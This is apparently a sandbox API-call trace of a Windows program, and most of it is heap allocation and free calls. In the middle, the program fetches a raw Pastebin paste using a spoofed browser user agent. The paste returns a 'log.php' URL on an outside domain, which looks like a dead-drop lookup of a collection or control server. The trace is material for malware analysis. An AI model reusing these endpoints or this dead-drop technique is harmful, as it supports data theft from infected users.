RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda498 [0257.686] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda510 | out: hHeap=0xbc0000) returned 1 [0257.686] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda510 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b48 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda4b0 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b38 [0257.686] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe488 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda4c8 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda450 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda468 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda480 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda408 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda420 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda438 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda3c0 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda3d8 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda3f0 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda378 [0257.687] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe4b0 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda390 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3a8 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.687] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda378 | out: hHeap=0xbc0000) returned 1 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b18 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe4d8 [0257.687] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0257.687] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe4d8 | out: hHeap=0xbc0000) returned 1 [0257.687] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda378 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb318 [0257.687] PeekMessageW (in: lpMsg=0x7df28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df28c) returned 0 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe4d8 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda330 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda348 [0257.687] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.687] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda360 [0257.687] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0257.687] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda330 | out: hHeap=0xbc0000) returned 1 [0257.687] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe4d8 | out: hHeap=0xbc0000) returned 1 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd33f0 | out: hHeap=0xbc0000) returned 1 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe50e0 | out: hHeap=0xbc0000) returned 1 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda360 | out: hHeap=0xbc0000) returned 1 [0257.688] PeekMessageW (in: lpMsg=0x7df28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df28c) returned 0 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xbe50e0 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda360 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe50e0 | out: hHeap=0xbc0000) returned 1 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe4d8 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda330 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe50e0 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda348 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2e8 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda360 | out: hHeap=0xbc0000) returned 1 [0257.688] PeekMessageW (in: lpMsg=0x7df28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df28c) returned 0 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe500 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda360 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b08 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe528 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda300 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01af8 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda318 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01ae8 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d3d8 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2a0 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ad8 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x50) returned 0xc43938 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2a0 | out: hHeap=0xbc0000) returned 1 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d3d8 | out: hHeap=0xbc0000) returned 1 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ae8 | out: hHeap=0xbc0000) returned 1 [0257.688] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01af8 | out: hHeap=0xbc0000) returned 1 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x50) returned 0xc439e8 [0257.688] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01af8 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2a0 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ae8 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2b8 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ac8 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2d0 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ab8 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda258 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01aa8 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda270 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01a98 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda288 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01a88 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda210 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01a78 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda228 [0257.689] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01a68 [0257.689] InternetCrackUrlW (in: lpszUrl="http://pastebin.com/raw.php?i=7MDswaSn", dwUrlLength=0x26, dwFlags=0x0, lpUrlComponents=0x7debd8 | out: lpUrlComponents=0x7debd8) returned 1 [0257.763] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2d0 | out: hHeap=0xbc0000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbff1f8 [0257.763] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda288 | out: hHeap=0xbc0000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbff248 [0257.763] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda210 | out: hHeap=0xbc0000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbff270 [0257.763] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x28) returned 0xbfc480 [0257.763] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01c68 [0257.763] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda228 | out: hHeap=0xbc0000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xc0ff90 [0257.764] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfc480 | out: hHeap=0xbc0000) returned 1 [0257.764] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01c68 | out: hHeap=0xbc0000) returned 1 [0257.764] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0257.764] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x7dec20, dwBufferLength=0x8) returned 1 [0257.765] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x7dec2c | out: lpBuffer=0x0, lpdwBufferLength=0x7dec2c) returned 0 [0257.923] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda918 [0257.923] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0xcda918, lpdwBufferLength=0x7dec2c | out: lpBuffer=0xcda918, lpdwBufferLength=0x7dec2c) returned 1 [0257.923] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda918 | out: hHeap=0xbc0000) returned 1 [0257.923] InternetConnectW (hInternet=0xcc0004, lpszServerName="pastebin.com", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0257.924] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/raw.php?i=7MDswaSn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0257.925] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0258.893] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x7debe0, lpdwBufferLength=0x7debd8, lpdwIndex=0x7debdc*=0x0 | out: lpBuffer=0x7debe0*, lpdwBufferLength=0x7debd8*=0x4, lpdwIndex=0x7debdc*=0x0) returned 1 [0258.893] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x7debfc, lpdwBufferLength=0x7dec28, lpdwIndex=0x7dec2c*=0x0 | out: lpBuffer=0x7debfc, lpdwBufferLength=0x7dec28, lpdwIndex=0x7dec2c*=0x0) returned 0 [0258.893] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x7deb60 | out: lpCharType=0x7deb60) returned 1 [0258.894] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x7debdc, dwFlags=0x0, dwContext=0x0) returned 1 [0258.894] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x2b) returned 0xe3a020 [0258.894] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xe3a020, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x7debe0 | out: lpBuffer=0xe3a020*, lpdwNumberOfBytesRead=0x7debe0*=0x2b) returned 1 [0258.894] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6cb0 [0258.894] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xd866a8 [0258.894] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x2b) returned 0xe3a058 [0258.894] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xe3a058, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x7debe0 | out: lpBuffer=0xe3a058*, lpdwNumberOfBytesRead=0x7debe0*=0x0) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe3a058 | out: hHeap=0xbc0000) returned 1 [0258.894] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc0ff90 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a68 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbff270 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a78 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbff248 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a88 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda270 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a98 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda258 | out: hHeap=0xbc0000) returned 1 [0258.894] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01aa8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbff1f8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ab8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2b8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ac8 | out: hHeap=0xbc0000) returned 1 [0258.895] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01ac8 [0258.895] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x2b) returned 0xc0ff90 [0258.895] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0258.895] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0258.895] CloseHandle (hObject=0x0) returned 0 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe3a020 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd866a8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6cb0 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2a0 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ae8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc439e8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01af8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc43938 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ad8 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda318 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda300 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe528 | out: hHeap=0xbc0000) returned 1 [0258.895] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b08 | out: hHeap=0xbc0000) returned 1 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x2c) returned 0xe3a020 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b08 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x58) returned 0xd9b998 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ad8 [0258.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xe3a020, cbMultiByte=44, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x58) returned 0xd9ba58 [0258.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xe3a020, cbMultiByte=44, lpWideCharStr=0xd9ba58, cchWideChar=44 | out: lpWideCharStr="https://panicvolunteers.com/bgr/log/log.php") returned 44 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd9ba58 | out: hHeap=0xbc0000) returned 1 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda300 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe3a020 | out: hHeap=0xbc0000) returned 1 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b08 | out: hHeap=0xbc0000) returned 1 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc0ff90 | out: hHeap=0xbc0000) returned 1 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ac8 | out: hHeap=0xbc0000) returned 1 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda360 | out: hHeap=0xbc0000) returned 1 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe500 | out: hHeap=0xbc0000) returned 1 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe500 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda360 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b18 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda318 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2a0 [0258.896] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda300 | out: hHeap=0xbc0000) returned 1 [0258.896] PeekMessageW (in: lpMsg=0x7df28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df28c) returned 1 [0258.896] TranslateMessage (lpMsg=0x7df28c) returned 0 [0258.896] DispatchMessageW (lpMsg=0x7df28c) returned 0x0 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20a) returned 0xc073f0 [0258.896] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ac8 [0258.896] Shell_NotifyIconW (dwMessage=0x1, lpData=0x7de928) returned 1 [0258.897] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc073f0 | out: hHeap=0xbc0000) returned 1 [0258.897] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ac8 | out: hHeap=0xbc0000) returned 1 [0258.897] KillTimer (hWnd=0x40172, uIDEvent=0x1) returned 1 [0258.897] SetTimer (hWnd=0x40172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0258.897] PeekMessageW (in: lpMsg=0x7df28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df28c) returned 0 [0258.897] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01ac8 [0258.897] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b08 [0258.897] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20a) returned 0xc073f0 [0258.897] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01af8 [0258.897] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc073f0 | out: hHeap=0xbc0000) returned 1 [0258.897] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01af8 | out: hHeap=0xbc0000) returned 1 [0258.897] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b08 | out: hHeap=0xbc0000) returned 1 [0258.897] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ac8 | out: hHeap=0xbc0000) returned 1 [0258.898] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc13878 [0258.898] PeekMessageW (in: lpMsg=0x7df28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df28c) returned 0 [0258.898] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01ac8 [0258.898] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda300 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ac8 | out: hHeap=0xbc0000) returned 1 [0258.898] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdaa38 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda300 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc13878 | out: hHeap=0xbc0000) returned 1 [0258.898] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda300 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdaa38 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfb318 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2e8 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda330 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe50e0 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe4d8 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2a0 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda318 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda360 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe500 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda378 | out: hHeap=0xbc0000) returned 1 [0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0258.898] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda378 [0258.898] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda360 [0258.898] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 